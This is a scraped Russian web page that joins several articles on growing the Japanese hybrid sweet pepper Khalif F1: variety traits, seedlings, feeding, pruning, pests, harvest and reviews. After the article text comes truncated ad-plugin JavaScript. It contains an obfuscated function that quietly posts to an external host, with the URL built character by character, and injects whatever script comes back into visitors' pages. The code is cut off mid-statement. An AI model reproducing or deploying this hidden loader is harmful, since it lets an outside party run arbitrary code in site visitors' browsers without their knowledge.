5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Выращивание перца халиф

Выращивание перца Халиф F1

Японскими селекционерами была выведена гибридная культура – перец Халиф, который сразу завоевал благосклонность многих овощеводов благодаря своим многочисленным положительным характеристикам. Растение активно выращивается на многих дачных участках, принося своим владельцам достойный урожай.

Выращивание перца Халиф F1

Характеристика сорта

Каждое растение обладает определенными характеристиками, которые учитываются при его выращивании. Зная описание культуры, огородник имеет возможность получить отличный урожай.

Перец Халиф относят к раннесозревающим видам. Плодоношение начинается по истечении 90-95 дней с момента появления первых всходов.

Выращивание овоща возможно как в тепличных условиях, так и в открытом грунте. Период плодоношения отличается продолжительностью.

Куст обладает такими характеристиками:

  • высота растения составляет 50-90 см;
  • он компактный, но требует формирования.

Плоды

  • овощи имеют кубовидную форму, плотные по структуре;
  • цвет плода на стадии технической спелости молочно-белый, светло-зеленый, биологической – насыщенно-красный;
  • мякоть сочная, без характерной для перца горчинки;
  • овощи лежкие, отлично хранятся, способны переносить продолжительную транспортировку, не теряя вкусовых и товарных качеств;
  • плоды универсальны в применении: могут использоваться в свежем виде или для приготовления зимних заготовок.

Урожайность

При благоприятных условиях урожайность перца Халиф f1 радует садоводов высокими показателями: с 1 м² за сезон можно собрать больше ведра отборных овощей. Крупные, мясистые плоды имеют вес 100-200 г. Собирать их лучше в момент технической зрелости, что не будет задерживать формирование последующих завязей.

Достоинства и недостатки

Среди преимуществ перца выделяют следующие:

  • гибридное растение хорошо формирует завязи практически в любых условиях выращивания;
  • сорт обладает повышенной устойчивостью к таким заболеванием, как табачная мозаика;
  • при благоприятных условиях растение способно дать максимально высокий для таких культур урожай.

Среди главных недостатков отмечают слабую корневую систему и необходимость подвязывания и формирования куста.

Выращивание рассады

Сорт перца Халиф f1 рекомендуют выращивать рассадным способом в связи с тем, что вегетационный период растения продолжительный. Такой метод позволяет высаживать на постоянное место окрепшие сеянцы, которые смогут быстрее адаптироваться в новых условиях.

Условия

Чтобы рассада была здоровой и сильной, необходимо соблюдать ряд условий ее выращивания:

  • оптимальная температура для проращивания семян должна составлять 25-28 °C;
  • емкости под посев и почву, в которую будут помещены семена, желательно предварительно продезинфицировать при помощи пропаривания (полить горячим раствором марганцовки, обеззаразить перекисью водорода или другим антисептическим средством) или прокаливания (грунт держат на протяжении 30-40 мин. в горячем духовом шкафу);
  • до момента высадки рассады ее стоит не менее 2 раз удобрить органическими подкормками.

Сроки и технология посадки

Высевать семена овоща следует за 50-70 дней до пересаживания рассады на постоянное место. Посев начинают в марте-апреле.

  • посевной материал перед высеванием рекомендуют замочить на 15-30 мин. в слабом растворе антисептического средства (марганцовка, перекись водорода и др.) с добавлением в него стимулятора роста («Корневин», «Эпин» и т.д.);
  • после обеззараживания семена просушивают, при желании их можно прорастить. Для этого их помещают во влажную ткань и кладут на 1-2 дня в теплое место. За это время нельзя допустить высыхание материала, поэтому необходимо регулярно увлажнять семена теплой водой при помощи пульверизатора;
  • посевной материал размещают в общем контейнере или отдельных емкостях во влажной почве на глубине 1-1,5 см. После этого посадки накрывают пленочным материалом и помещают в теплое затемненное место до момента появления первых всходов. За этот период желательно ежедневно проветривать сеянцы;
  • после появления молодых ростков пленку с контейнера снимают, а рассаду помещают в хорошо освещенное теплое место.

Уход за рассадой

Молодые и неокрепшие сеянцы требуют к себе повышенного внимания. Регулярно необходимо поливать их теплой отстоянной водой, не допуская переувлажнения или пересыхания почвы. Если ростки выглядят ослабленными и безжизненными, предлагают удобрить почву жидкой подкормкой с органическими веществами.

Если культура была посеяна в общий ящик, после появления на рассаде 2-3 настоящих листков ее пикируют (пересаживают) в отдельные емкости объемом 0,3-0,5 л. Корневая система молодых перцев чувствительна к повреждениям, поэтому делать пикировку стоит предельно аккуратно.

После пересадки перец может приостановиться в росте. В этот стрессовый для культур период можно применить опрыскивание их препаратом «Эпин» или другим веществом, стимулирующим их рост.

Пересадка рассады

Сладкий и вкусный перец в удобренной земле

Сладкий перец сорта Халиф хорошо растет в легкой, рыхлой, хорошо удобренной почве. Осенью предварительно вносят в нее органические и калийно-фосфорные удобрения. Весной желательно обогатить грунт аммиачной селитрой (30-40 г на 1 м).

За 5-7 дней до пересадки сеянцев рекомендуют провести обеззараживание почвы при помощи раствора медного купороса (1 ст. л. на 10 л воды).

В открытый грунт рассаду пересаживают, когда почва хорошо прогрелась и риск возникновения ночных похолоданий минимален (конец весны-начало лета). Для тепличного выращивания высаживать перец можно в начале апреля.

Схема посадки молодых перцев Халиф f1: на 1 м² размещают по 3-4 куста. Помещать сеянец в лунку необходимо на такую же глубину, на которой он рос в рассаднике, не обнажая корневую систему и не пряча в почву корневую шейку. Сразу после пересадки желательно провести полив и прикрепить культуру к установленной рядом опоре.

Перцы склонны к переопылению, поэтому высаживать несколько сортов рядом не рекомендуется.

Сажать этот овощ желательно после бобовых, ранней капусты, зелени или лука.

Правильный уход за перцем даст возможность получить максимальный урожай качественных овощей. Это способствует тому, что культура будет обладать хорошим иммунитетом, меньше подвергаться типичным для этих овощей заболеваниям и нападениям вредителей.

Полив

Увлажнение почвы должно быть регулярным, но умеренным. Избыток влаги может привести к бактериальным заболеваниям корневой системы культуры, а ее нехватка ослабит овощ – листья будут желтеть и осыпаться и урожайность будет значительно ниже.

Полив проводят утром или вечером теплой дождевой или отстоянной водой. Чередовать его желательно с рыхлением и прополкой. Это позволит сохранить влагу в почве на более продолжительное время, а доступ воздуха к корневищу улучшится. Некоторые овощеводы проводят мульчирование почвы соломой.

Подкормки

Перцы нуждаются в постоянном уходе

За сезон перец советуют удобрять не менее 3-4 раз. Систематическое наблюдение за состоянием растений позволит максимально быстро определить, какого вещества не хватает почве.

В фазе появления 1-2 настоящих листков осуществляют первую подкормку при помощи такого раствора: в 1 л воды добавляют 2-3 г суперфосфата, 0,5 г селитры, 1-2 г калийного вещества. Через 2 недели подкормку повторяют, увеличивая количество минеральных удобрений до 2 раз.

Популярны среди огородников подкормки перца крапивным настоем, раствором куриного помета (1:10). Желательно чередовать их с минеральными подпитками (1 ст. л. нитрофоски на 10 л воды).

Регулярно в почву необходимо вносить калийно-фосфорные удобрения, которые влияют на количество завязей на культуре и качество овощей.

Обрезка и формирование куста

Куст перца Халиф описывают как компактный, но это не избавляет садовода от необходимости регулярного пасынкования (обрезки) культуры. Суть его заключается в удалении боковых побегов, которые ускоряют свой рост при влажной погоде. Проводить пасынкование в жару нежелательно: наличие дополнительной листвы на кусте предохраняет почву от быстрого испарения влаги.

Обрезке подлежат нижние, самые длинные побеги, нужно стараться достичь максимального освещения куста солнечными лучами. Удалять также стоит лишние ветви культуры. Пасынкование проводят 1 раз в 7-10 дней, при необходимости – чаще.

Сорт Халиф требует формирования куста с последующим его подвязыванием. По достижению культурой высоты 20-25 см верхушку, которая находится на основном стебле, удаляют. Из оставшихся крепких побегов рекомендуют оставлять не более 3-4 пасынков.

Для ускорения созревания овощей огородники советуют еще раз дополнительно удалить верхушку кустового растения по прошествии половины периода плодоношения.

Борьба с болезнями и вредителями

Среди болезней, которым подвергается овощ, выделяют серую и белую гниль, ложную мучнистую росу, фитофтороз, черную ножку и др. Халиф обладает повышенным иммунитетом к такому характерному для перцев заболеванию, как табачная мозаика.

Гораздо проще провести профилактические меры, которые предотвратят возникновение болезни, чем вылечить уже зараженную культуру. В качестве профилактики от заболеваний осуществляют следующие обработки:

  • 0,05 % раствором перманганата калия;
  • «Превикуром»;
  • 4 % раствором хлорокиси меди;
  • бордоской жидкостью;
  • древесным углем и др.

В качестве предупреждения заболеваний в обязательном порядке нужно учитывать схему посадки культуры, не переувлажнять почву, проводить регулярное проветривание теплиц. Систематический осмотр овощей даст возможность заметить заболевание на первых стадиях его развития.

Среди вредителей, которые могут негативным образом повлиять на урожайность перца, выделяют тлю, паутинного клеща, слизней, колорадских жуков и т.д. От них регулярно проводят обработки специальными фунгицидами, совмещая их с народными методами (настои чеснока, лука, одуванчика, чистотела и др).

Сбор и хранение урожая

В зависимости от региона и условий, при которых выращивается сорт Халиф, плодоношение у него начинается в середине-конце июля и продолжается до первых заморозков. Для сбора подходят овощи в состоянии биологической и технической спелости. Во втором случае плоды следует отложить для дозревания.

Сбор урожая проводят каждые 6-8 дней с использованием острого ножа. Это предотвратит вероятность повреждения перца или его плодоножки, что может стать причиной сокращения периода хранения.

Овощи хранят в деревянных ящиках в прохладном и проветриваемом месте. Регулярно требуется осуществлять осмотр для изъятия из общего контейнера поврежденных плодов. При правильной организации хранения сладкого перца Халиф он может сохранять свои качества до 2 месяцев.

Раннеспелый и высокоурожайный гибрид перца «Калиф» (Халиф) от японских селекционеров

Перец Калиф (Халиф) отличается холодоустойчивостью и неприхотливостью. Гибрид подходит для выращивания в регионах с резкими изменениями погоды, жарой и засухой. Высаживают его в теплицах, парниках или в открытом грунте. Из перчика получаются вкусные и полезные блюда — мякоть нежная и сахаристая.

Рассмотрим далее описание перца Калиф и узнаем, как вырастить богатый урожай на своем участке.

Что это за перец

Сладкий перец Калиф — результат трудов японских селекционеров. Благодаря вкусовым качествам получил распространение по всему миру.

Гибрид f1

Гибрид показывает устойчивость к основным заболеваниям культуры — табачной мозаике, мучнистой росе, корневой гнили. Неприхотливый, редко подвергается вредителям и сорной траве.

Отличается длительным плодоношением, завязывает плоды в любых климатических условиях.

Отличительные черты

Раннеспелый, созревает за 90 дней с момента появления первых всходов. Кустики миниатюрные, около 50-60 см в высоту. Листья зеленые, среднего размера. Побеги короткие, мощные.

Характеристика плодов и урожайность

Плоды крупные, вес одного варьируется от 180 до 210 г. Форма призмовидная, вытянутая. Толщина стенок 9 мм, что позволяет использовать перцы для длительного хранения. Мякоть мясистая, сладкая.

В применении универсален, урожайность стабильная — 8-10 плодов с одного куста.

Подготовка к выращиванию

Посевной материал покупают в проверенных магазинах, при покупке изучают срок годности семян, производителя, целостность упаковки. Дома семена осматривают на наличие дефектов, экземпляры с пятнами или царапинами выкидывают. Оставшиеся семечки проверяют на всхожесть — опускают в банку с водой и солью (на 1 л воды 50 г соли) и размешивают по часовой стрелке. Опустившееся на дно семечки и используют для посадки.

Дезинфекцию семян проводят с помощью раствора марганцовки, сока алоэ или бордоской жидкости. Семена помещают в тканевый мешочек и опускают в жидкость на 20 минут, достают и просушивают на чистом полотенце. Обеззараживают также с помощью духовки — помещают на противень и убирают в духовой шкаф на час при температуре +180°С.

Важно! После дезинфекции материал проращивают — помещают во влажную марлю и убирают в теплое место на двое суток. Для ускорения развития добавляют стимулятор роста «Корневин».

Гибрид Калиф выращивают рассадным способом, поэтому заранее готовят емкость и почву. Подходит любая сухая и чистая тара — цветочные горшки, торфяные стаканчики, деревянные ящики. В качестве грунта применяют готовую почву из магазина или землю с огорода. Почву удобряют навозом, компостом или перегноем, добавляют чистый речной песок для рыхлости.

Выращивание рассады

Рассаду подготавливают в конце марта. Емкости наполняют почвой, делают бороздки глубиной 1 см. В каждую ямку помещают по 1-2 семени, присыпают сверху землей и поливают теплой водой.

Хранят рассаду в теплом и солнечном месте, сладкий перец — культура теплолюбивая. При недостатке естественного солнечного света покупают фитолампы.

Поливают рассаду по мере высыхания почвы, примерно раз в 4-6 дней. Важно не допустить переувлажнения земли, из-за чего возникают грибки и вирусы. Через две недели с момента посадки организуют подкормку навозом или куриным пометом. В следующий раз удобрение вносят через 15 дней, используют минеральные компоненты — суперфосфат, калийную соль, аммиачную селитру.

Важно! Если перец посажен в маленькие горшки или стаканчики, через месяц садоводы организуют пикировку, то есть пересаживают саженцы в емкость побольше. Если этого не сделать, то корням не хватит места для роста и развития. Пикируют ростки аккуратно, чтобы не повредить хрупкие корни и листья.

Посадка перца

Грядки для перца готовят с осени. Лучшие предшественники — горох, кукуруза, капуста. Не советуют высаживать овощ после картофеля или томатов. В конце октября землю перекапывают, убирают комки и сорняки, вносят навоз. В апреле почву перекапывают повторно, чистят от мусора и листвы. Рекомендуемая схема посадки перчика Калиф 50х70 см.

Для посадки выбирают пасмурное безветренное утро. В ямки глубиной 3-5 см помещают саженцы, прихлопывают основание стебля землей и посыпают торфяной крошкой. После посадки перец поливают, на грядки укладывают солому — она удерживает влагу и питает молодые растения. В первую неделю кустики накрывают пленкой или тонким стеклом для защиты от ветров и заморозков.

Важно! Перед посадкой в теплице все стены и двери протирают раствором янтарной кислоты, поливают землю бордоской жидкостью, проветривают сооружение.

Дальнейший уход

Перец Калиф требует своевременного ухода. Заключается он в подкормках, поливах и рыхлении грядок:

  1. На один куст расходуют около 2 л теплой воды. В дождливую погоду грядки поливают раз в неделю, в сухую и жаркую — раз в 4-5 дней. Если листики закручиваются, значит растению не хватает влаги, объем воды увеличивают. Лучшее время для процедуры — раннее утро или вечер, чтобы избежать солнечных ожогов и испарения.
  2. Рыхление помогает избавиться от сорняков, предотвратить их появление. Процедура делает почву более легкой и воздушной, улучшает приток кислорода к корням. Рыхлят грядки раз в неделю на глубину 5-10 см. Помимо кустиков, уделяют внимание и междурядьям, где часто появляется сорная трава.
  3. За период созревания перец Калиф удобряют 2-3 раза. Чередуют органику и минеральные комплексы: калий, фосфор, помет, мочевина, зола. Проводят процедуру каждые 15 дней, предварительно полив землю. Удобрения улучшают вкусовые качества плодов, их товарный вид, защищают от болезней и вредителей. Из внекорневых подкормок применяют опрыскивания бордоской жидкостью или настоем крапивы.

Особенности выращивания и возможные трудности

При выращивании гибрида важно соблюдать дозировку вносимых микроэлементов. Их переизбыток или дефицит приводит к опаданию листьев и порче плодов. При подкормке не используют удобрения, которые содержат хлор — например, хлористый аммоний. Он попадает в корневую землю и перекрывает доступ питательных веществ.

Предпочтение отдают фосфорно-калийным удобрениям и азотосодержащим веществам. Во время цветения делают акцент на органике — подкармливают жидким навозом.

Интересно! Эффективна подкормка на основе трав. Готовят средство из цветков и листвы подорожника, хмеля и хвоща. Растения измельчают, заливают кипятком и оставляют на несколько часов. После остывания кустики поливают под корень или опрыскивают листики из пульверизатора.

Если после цветения завязи опадают, а плоды останавливаются в росте, кустики обрабатывают раствором борной кислоты. Он питает корни и стебель, укрепляет иммунитет и стимулирует дальнейшее развитие.

Характерные болезни и вредители

Несмотря на устойчивость гибрида к грибкам и инфекциям, при неправильном уходе он может заболеть.

Наиболее опасные заболевания:

  1. Бурая пятнистость (кладоспориоз). Возникает из-за зараженной почвы, несоблюдении правил севооборота, жары и повышенной влажности. Стебли и листья покрываются коричневыми пятнами, которые со временем увеличиваются в размерах. В качестве профилактики используют опрыскивания молочной сывороткой, для лечения применяют профессиональный препарат «Заслон». Вносят средство строго в соответствии с дозировкой на упаковке.
  2. Черная бактериальная пятнистость поражает взрослые растения в период плодоношения. Для профилактики используют мыльный раствор или медный купорос. Если бактериальная пятнистость появилась, то пораженные кустики удаляют с грядки и сжигают подальше от участка. Оставшиеся растения обрабатывают раствором марганцовки.

Из вредителей выделяют колорадского жука. Полосатое насекомое поражает как молодые саженцы, так и взрослые кусты. Опасны личинки и взрослые особи. Колорадский жук способен жить под землей до двух лет, переносит холода и низкие температуры. Питается соком растения, из-за чего перцу не хватает витаминов для развития. Справиться с вредителем помогают препараты «Барьер» или «Торнадо».

Преимущества и недостатки сорта

К преимуществам относят высокую урожайность, неприхотливость, иммунитет к болезням и вредителям. Перцы отличаются товарным видом, выращивают Калиф для личного потребления и для продажи. Овощи долго хранятся и транспортируются, не теряют полезных качеств и вкуса. Этот гибрид высаживают под открытым небом, в теплицах или парниках.

Интересно! Ценится сладкий Калиф за универсальность в применении. Красные глянцевые плоды используют для приготовления овощного рагу, фаршированных блюд, закусок и салатов. В меру сочная мякоть гармонично сочетается с мясными и рыбными блюдами, перчики используют в свежем виде и маринуют на зиму в банках.

Единственный минус — рассада плохо переносит пикировку. Этого можно избежать: семена сразу высаживают в большие емкости, в которых рассада перчиков и развивается до высадки в открытый грунт.

Отзывы

Что о Калифе думают российские огородники? Приведем несколько отзывов с популярных интернет-форумов:

Марина, г. Ижевск: «Перец Халиф люблю давно. Меня привлекают компактные кусты, они украшают огород. Высаживаю в открытом грунте, удобряю навозом и калием. Период плодоношения растянутый, овощи отлично хранятся».

Петр, Подмосковье: «Японский Калиф мне не понравился. Кустики развивались медленно, хотя я готовил рассаду и вовремя пикировал. Плоды крупные, но на вкус водянистые. Я разочарован».

Елизавета, г. Краснодар: «Посадила красноплодный гибрид Калиф впервые. Меня порадовали крупные плоды и сахаристая мякоть — слаще перчика я не встречала. В этом сезоне посадила только одну грядку, в следующем отведу под Калиф три. В свежем виде вкус изумительный».

Заключение

Аппетитные плоды украсят любой участок. В уходе гибрид неприхотлив, главное — вовремя поливать и удобрять растения. Для получения богатого урожая высаживают рассадой, предварительно очистив грядки от мусора и сорняков.

Калиф благоприятно реагирует на минеральные и органические подкормки, имеет иммунитет перед болезнями. Собирают урожай в августе, когда перцы станут упругими и блестящими, а плодоножка — сухой. Используют Калиф в свежем виде или для приготовления супов, гарниров и салатов.

Один из самых популярных классических перцев — Халиф F1: характеристика и описание сорта

Существует много разновидностей красного болгарского перца, радующего своими размерами и массивными стенками, но селекционеры все время разрабатывают новые. Ведь такой перец – один из самых лучших, и его можно успешно продавать или выращивать для себя. Гибрид перца Халиф F1 – представитель замечательного вида перцев, очень популярный и востребованный.

Описание и характеристика сорта

Оригинатор болгарского перца Халиф F1 – японская компания Sakata, распространителями семян выступают фирмы «Престиж» и «Партнер». Гибрид в зависимости от климата выращивают в открытом, закрытом грунте и под временными укрытиями. Удобно высаживать его в тоннели из пленки, которые легко собираются и разбираются.

Куст индетерминантный, средней высоты – 60-90 см. Компактный, покрыт небольшими тонкими листьями. Сроки получения урожая ранние – 90-95 дней от появления всходов. Плоды отличаются такими свойствами:

  • кубовидно-призмовидная форма с закругленными на концах гранями;
  • очень крупные – 180-210 г при должном уходе;
  • стенки мясистые, 7-9 мм;
  • ярко-красный цвет;
  • вкус выражено сладкий, без горчинки.

Плоды одинаково вкусны в вареном, тушеном и жареном виде, заготовках, свежих салатах, фаршировке.

Преимущества и недостатки

  • крупные сочные плоды и толстый перикарпий;
  • отличные вкусовые качества;
  • высокая урожайность;
  • иммунитет к табачной мозаике;
  • высокие товарные качества;
  • возможность перевозить урожай и долго хранить его.

Минусы:

  • собственные семена не сохраняют качеств оригинала.

Урожайность

С 1 кв. м можно получить до 14 кг плодов.

Посадка

Для рассады готовят индивидуальные горшочки с питательной смесью. Ее готовят из земли с участка, смешанной с таким же количеством песка и перегноя. Вместо перегноя можно положить торф. На 10 л смеси добавляют 50 г минеральных удобрений и 2-3 горсти золы.

Семена без предварительной обработки сеют за 60-70 дней до высадки рассады. Проращивают их при +26-28 градусов, затем снижают температуру до +18-25. Освещают фитолампами до 12-16 часов в день.

Выращивание и уход

Растение формируют, обрезая до первой развилки. Также удаляют из нее первый цветок. Подвязывают стебли.

Поливают отстоянной на солнце водой температурой +22-24. Вносят ее под корень, обычно 1-2 раза в неделю, но в жару можно чаще, а в дождливые периоды реже. Когда кусты окрепнут, начинают аккуратно рыхлить твердую корку на почве, которая появляется от воды.

Подкармливают 3-4 раза. Используют минеральные комплексы «Кемира», «Агрикола», «Аэлита-овощное» и аналоги. Можно самостоятельно смешивать суперфосфат, сульфат калия, другие подкормки с калием и фосфором и готовить растворы по инструкции. В начале роста вносят азотные подкормки в умеренных концентрациях.

Болезни и вредители

Гибрид не болеет табачной мозаикой. При правильном уходе он устойчив и к другим болезням. Для профилактики следует:

  • соблюдать севооборот;
  • держать участок в чистоте, пропалывать сорняки и очищать от старой ботвы;
  • дезинфицировать грунт перед высадкой кустов;
  • поливать растения умеренно;
  • бороться с паразитами.

Наиболее уязвим гибрид к следующим болезням:

  1. Черной ножке. Признаки – растение темнеет у корней, стебель подгнивает. Для борьбы с болезнью уменьшают полив, а стебли припудривают золой или поливают слабым раствором марганцовки.
  2. Фитофторозом. От этого грибка быстро чернеют и портятся все листья и плоды. Он вызывается спорами, которые пробуждаются при повышенной сырости и холоде. Для борьбы кусты сразу опрыскивают раствором «Гамаира», «Фитоспорина-М» или «Алирина» по инструкции.
  3. Вершинной гнили. Она проявляется при нехватке кальция и передозировке азота. Необходимо сократить азотные подкормки и удобрить куст кальцием по листу.
  4. Белой гнили. Больные кусты уничтожают, а здоровые поливают теплой водой и обрабатывают фунгицидом.

От вредителей избавляются с помощью инсектицидов и домашних средств: настоя чистотела, золы, мыльного раствора.

На100ящий сладкий перец «Халиф f1»! Хорош в любом виде!

Здравствуйте, дорогие садоводы, огородники и цветоводы. Мы продолжаем обзор перца сладкого под названием «Халиф» в моей теплице.

Содержание

Здравствуйте, дорогие садоводы, огородники и цветоводы. Мы продолжаем обзор перца сладкого под названием «Халиф» в моей теплице.

Перец у нас кубовидной, призмовидной, я бы даже сказал, формы. Перец японской селекции фирмы Sakata. Мы его приобретаем в больших упаковках, фасуем в свои по 5 семян и имеем возможность реализовать на российский рынок через интернет-магазин либо оптом в нашем розничном магазине.

Характеристики сорта

Перец очень интересен тем, что он урожайный. Прежде всего, вы посмотрите на кустах сколько перцев. Урожайность здесь запредельная. Хорош он еще своими вкусовыми качествами, ведь японцы всегда делают вкусные овощи. Это уже давно известный факт. Они молодцы в этом плане и, честно говоря, перец «Халиф» вкусовыми качествами нас очень удивил.

А самое главное, в линейке агрофирмы «Партнер» не было перца, который бы созревал через вот такую интересную окраску, создавал белёсость, белую окраску, такая бланжевая белая окраска. Ведь в такой окраске перец можно употреблять в пищу, и он будет очень вкусным и мало чем будет уступать красному перцу по вкусовым качествам. А красным перец может стать уже на подоконнике дома, либо можно дождаться, когда он созреет на нашем участке.

Размер и масса перцев очень удобны для того, чтобы его фаршировать. Очень хороший, красивый, 3-5 5-камерный. Как правило, все-таки 4-5 камер, поэтому он такой тяжеленький.

Я думаю, что этот весит граммов 200. Давайте взвесим его. Кстати, при фаршировке чем характерен этот перец – его можно вот так вот ставить. Рядом еще в кастрюльку перцы ставим и очень удобно, они не будут падать. Собственно говоря, они будут очень красивыми, если подавать на стол.

207 г. Стабильная масса. Конечно, это очень удобно и очень хорошо. Но тем и хороши гибриды, что они устойчивы к заболеваниям, что они равномерны в своем размере и очень-очень толстостенные и вкусные.

Особенности выращивания

Смотрите, какие выровненные стенки. Многим из вас уже известен перец «Халиф». Самое главное, правильно формируйте перец. Посмотрите видео на нашем канале, которое рассказывает, как правильно формировать перец. Очень интересно. И не забывайте про почву. Обязательно удобряйте. В 3 стебля формирование, созревание раннее. Так что перцы вы будете получать в ранние сроки. Вкусные, зрелые, сладкие, очень приятные на вкус. Кожица не грубая. Я люблю вообще перец. К «Халифу» мы уже второй год присматривались, как только ввели в ассортимент. Мы же сразу так не вводим. Мы, пока у себя не вырастим два раза, вам не покажем, сами не убедимся, в ассортимент не включим. Замечательный перец, и он достоин расти на огородах наших уважаемых садоводов. В средней полосе России он замечательно себя чувствует, а на юге будет вообще хорошо.

Сейчас мы соберем эти плоды. Бабье лето, эти все плоды, уже достигшие этой массы, мы собираем. а вот эти, которые наверху остались, мы их оставляем. Перцы достаточно высокорослые, и в хорошую погоду они бы еще выше выросли. Они обсыпанные вторичными плодами. Вторая волна идет, урожайность очень большая.

Дорогие друзья, сажайте по схеме посадки 5 растений на метр, чтобы они хорошо были освещены. Тогда вы будете получать колоссальный урожай, даже больше, чем у нас.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var 